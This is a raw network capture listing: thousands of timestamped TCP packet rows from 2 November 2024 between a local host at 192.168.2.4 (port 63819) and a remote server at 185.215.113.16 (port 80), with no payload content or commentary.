                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938208103 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938215971 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938226938 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938232899 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938236952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938249111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938251019 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938261986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938271999 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938275099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938281059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938311100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938330889 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938343048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938352108 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938361883 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938374043 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938375950 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938385010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938386917 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938396931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938406944 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938414097 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938417912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938425064 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938437939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938447952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938448906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938460112 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938469887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938477993 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938479900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938491106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938489914 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938508034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938518047 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938523054 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938529015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938538074 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938541889 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938551903 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938553095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938565969 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938579082 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938586950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938591003 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938597918 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938608885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938621044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938626051 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938631058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938642979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938643932 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938661098 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938667059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938676119 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938685894 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938688993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938699961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938709021 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938713074 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938731909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938736916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938743114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938750982 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938755035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938767910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938776016 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938777924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938801050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938817978 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938945055 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938956976 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938967943 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938981056 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.938987017 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939007998 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939034939 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939117908 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939133883 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939143896 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939147949 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939153910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939165115 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939167976 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939177036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939182043 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939204931 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939218044 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939229012 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939260006 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939332008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939341068 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939351082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939362049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939373970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939377069 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939387083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939402103 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939425945 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939466000 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939475060 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939491034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939502001 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939506054 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939511061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939522028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939524889 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939542055 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939544916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939553976 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939563990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939573050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939577103 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939598083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939598083 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939610004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939620018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939623117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939632893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939645052 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939651966 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939656019 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939662933 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939668894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939687014 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939708948 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939733982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939747095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939758062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939766884 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939778090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939784050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939791918 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939811945 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939847946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939860106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939873934 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939894915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939908028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939975977 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939985991 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.939996004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940011978 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940015078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940026045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940030098 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940037012 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940049887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940053940 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940067053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940068960 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940094948 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940098047 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940109015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940119982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940134048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940156937 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940172911 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940237999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940256119 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940265894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940278053 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940291882 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940305948 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940316916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940325975 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940347910 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940366030 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940442085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940453053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940463066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940485954 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940498114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940509081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940510988 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940524101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940531969 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940547943 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940565109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940594912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940604925 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940614939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940629005 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940639019 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940643072 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940653086 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940663099 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940663099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940671921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940679073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940689087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940691948 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940701962 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940727949 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940731049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940742016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940753937 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940774918 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940804958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940817118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940843105 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940870047 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940871954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940881014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940897942 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940907955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940911055 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940929890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940946102 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940948963 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940952063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940962076 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940972090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940972090 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940983057 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.940984011 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941006899 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941035032 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941054106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941065073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941076040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941087008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941097975 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941102028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941113949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941124916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941126108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941133976 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941168070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941193104 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941210032 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941220999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941226006 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941237926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941248894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941251040 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941262007 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941281080 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941299915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941312075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941322088 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941337109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941342115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941349030 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941360950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941364050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941373110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941392899 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941415071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941540956 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941556931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941569090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941572905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941580057 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941592932 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941607952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941622972 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941641092 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941651106 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941660881 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941673040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941679955 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941684008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941693068 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941715956 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941744089 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941756964 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941767931 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941777945 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941797018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941800117 CET8063819185.215.113.16192.168.2.4
